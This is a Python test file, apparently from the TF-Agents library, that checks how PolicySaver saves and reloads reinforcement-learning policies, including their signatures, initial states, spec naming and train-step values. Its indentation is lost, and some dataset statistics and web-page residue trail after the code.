# Even with a seed, multiple calls to action will get different
# values, so here we just check the signature matches.
tf.nest.map_structure(match_dtype_shape,
reloaded_action_output_no_input_state,
reloaded_action_output)
self.evaluate(tf.compat.v1.global_variables_initializer())
(reloaded_action_output_dict,
reloaded_action_output_value) = self.evaluate(
(reloaded_action_output_dict, reloaded_action_output))
self.assertAllEqual(
action_output_dict.keys(), reloaded_action_output_dict.keys())
for k in action_output_dict:
if seeded:
self.assertAllClose(
action_output_dict[k],
reloaded_action_output_dict[k],
msg='\nMismatched dict key: %s.' % k)
else:
match_dtype_shape(action_output_dict[k],
reloaded_action_output_dict[k],
msg='\nMismatch dict key: %s.' % k)
# With non-signature functions, we can check that passing a seed does
# the right thing the second time.
if seeded:
tf.nest.map_structure(
self.assertAllClose,
action_output_value,
reloaded_action_output_value)
else:
tf.nest.map_structure(
match_dtype_shape,
action_output_value,
reloaded_action_output_value)
def testSaveGetInitialState(self):
network = q_rnn_network.QRnnNetwork(
input_tensor_spec=self._time_step_spec.observation,
action_spec=self._action_spec)
policy = q_policy.QPolicy(
time_step_spec=self._time_step_spec,
action_spec=self._action_spec,
q_network=network)
saver_nobatch = policy_saver.PolicySaver(
policy, batch_size=None, use_nest_path_signatures=False)
path = os.path.join(self.get_temp_dir(), 'save_model_initial_state_nobatch')
saver_nobatch.save(path)
reloaded_nobatch = tf.compat.v2.saved_model.load(path)
self.assertIn('get_initial_state', reloaded_nobatch.signatures)
reloaded_get_initial_state = (
reloaded_nobatch.signatures['get_initial_state'])
self._compare_input_output_specs(
reloaded_get_initial_state,
expected_input_specs=(
tf.TensorSpec(dtype=tf.int32, shape=(), name='batch_size'),),
expected_output_spec=policy.policy_state_spec,
batch_input=False,
batch_size=None)
initial_state = policy.get_initial_state(batch_size=3)
initial_state = self.evaluate(initial_state)
reloaded_nobatch_initial_state = reloaded_nobatch.get_initial_state(
batch_size=3)
reloaded_nobatch_initial_state = self.evaluate(
reloaded_nobatch_initial_state)
tf.nest.map_structure(
self.assertAllClose, initial_state, reloaded_nobatch_initial_state)
saver_batch = policy_saver.PolicySaver(policy, batch_size=3,
use_nest_path_signatures=False)
path = os.path.join(self.get_temp_dir(), 'save_model_initial_state_batch')
saver_batch.save(path)
reloaded_batch = tf.compat.v2.saved_model.load(path)
self.assertIn('get_initial_state', reloaded_batch.signatures)
reloaded_get_initial_state = reloaded_batch.signatures['get_initial_state']
self._compare_input_output_specs(
reloaded_get_initial_state,
expected_input_specs=(),
expected_output_spec=policy.policy_state_spec,
batch_input=False,
batch_size=3)
reloaded_batch_initial_state = reloaded_batch.get_initial_state()
reloaded_batch_initial_state = self.evaluate(reloaded_batch_initial_state)
tf.nest.map_structure(
self.assertAllClose, initial_state, reloaded_batch_initial_state)
def testNoSpecMissingOrColliding(self):
spec_names = set()
flat_spec = tf.nest.flatten(self._time_step_spec)
missing_or_colliding = [
policy_saver._true_if_missing_or_collision(s, spec_names)
for s in flat_spec
]
self.assertFalse(any(missing_or_colliding))
def testTrueIfMissing(self):
time_step_spec = self._time_step_spec._replace(
observation=tensor_spec.BoundedTensorSpec(
dtype=tf.float32, shape=(4,), minimum=-10.0, maximum=10.0))
spec_names = set()
flat_spec = tf.nest.flatten(time_step_spec)
missing_or_colliding = [
policy_saver._true_if_missing_or_collision(s, spec_names)
for s in flat_spec
]
self.assertTrue(any(missing_or_colliding))
def testTrueIfCollision(self):
time_step_spec = self._time_step_spec._replace(
observation=tensor_spec.BoundedTensorSpec(
dtype=tf.float32,
shape=(4,),
name='st',
minimum=-10.0,
maximum=10.0))
spec_names = set()
flat_spec = tf.nest.flatten(time_step_spec)
missing_or_colliding = [
policy_saver._true_if_missing_or_collision(s, spec_names)
for s in flat_spec
]
self.assertTrue(any(missing_or_colliding))
def testRenameSpecWithNestPaths(self):
time_step_spec = self._time_step_spec._replace(observation=[
tensor_spec.TensorSpec(
dtype=tf.float32,
shape=(4,),
name='obs1',
),
tensor_spec.TensorSpec(
dtype=tf.float32,
shape=(4,),
name='obs1',
)
])
renamed_spec = policy_saver._rename_spec_with_nest_paths(time_step_spec)
new_names = [s.name for s in tf.nest.flatten(renamed_spec)]
self.assertAllEqual(
['step_type', 'reward', 'discount', 'observation/0', 'observation/1'],
new_names)
def testTrainStepSaved(self):
# We need to use one default session so that self.evaluate and the
# SavedModel loader share the same session.
with tf.compat.v1.Session().as_default():
network = q_network.QNetwork(
input_tensor_spec=self._time_step_spec.observation,
action_spec=self._action_spec)
policy = q_policy.QPolicy(
time_step_spec=self._time_step_spec,
action_spec=self._action_spec,
q_network=network)
self.evaluate(tf.compat.v1.initializers.variables(policy.variables()))
train_step = common.create_variable('train_step', initial_value=7)
self.evaluate(tf.compat.v1.initializers.variables([train_step]))
saver = policy_saver.PolicySaver(
policy, batch_size=None, train_step=train_step)
path = os.path.join(self.get_temp_dir(), 'save_model')
saver.save(path)
reloaded = tf.compat.v2.saved_model.load(path)
self.assertIn('get_train_step', reloaded.signatures)
self.evaluate(tf.compat.v1.global_variables_initializer())
train_step_value = self.evaluate(reloaded.train_step())
self.assertEqual(7, train_step_value)
train_step = train_step.assign_add(3)
self.evaluate(train_step)
saver.save(path)
reloaded = tf.compat.v2.saved_model.load(path)
self.evaluate(tf.compat.v1.global_variables_initializer())
train_step_value = self.evaluate(reloaded.train_step())
self.assertEqual(10, train_step_value)
def testTrainStepNotSaved(self):
network = q_network.QNetwork(
input_tensor_spec=self._time_step_spec.observation,
action_spec=self._action_spec)
policy = q_policy.QPolicy(
time_step_spec=self._time_step_spec,
action_spec=self._action_spec,
q_network=network)
saver = policy_saver.PolicySaver(policy, batch_size=None)
path = os.path.join(self.get_temp_dir(), 'save_model')
saver.save(path)
reloaded = tf.compat.v2.saved_model.load(path)
self.assertIn('get_train_step', reloaded.signatures)
train_step_value = self.evaluate(reloaded.train_step())
self.assertEqual(-1, train_step_value)
def _compare_input_output_specs(self,
function,
expected_input_specs,
expected_output_spec,
batch_input,
batch_size=None):
args, kwargs = function.structured_input_signature
self.assertFalse(args)
def expected_spec(spec, include_batch_dimension):
if include_batch_dimension:
return tf.TensorSpec(
dtype=spec.dtype,
shape=tf.TensorShape([batch_size]).concatenate(spec.shape),
name=spec.name)
else:
return spec
expected_input_spec_dict = dict(
(spec.name, expected_spec(spec, include_batch_dimension=batch_input))
for spec in tf.nest.flatten(expected_input_specs))
expected_output_spec_dict = dict(
(spec.name, expected_spec(spec, include_batch_dimension=True))
for spec in tf.nest.flatten(expected_output_spec))
self.assertEqual(kwargs, expected_input_spec_dict)
self.assertEqual(function.structured_outputs, expected_output_spec_dict)
if __name__ == '__main__':
tf.test.main()
| 38.874172 | 80 | 0.676263 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.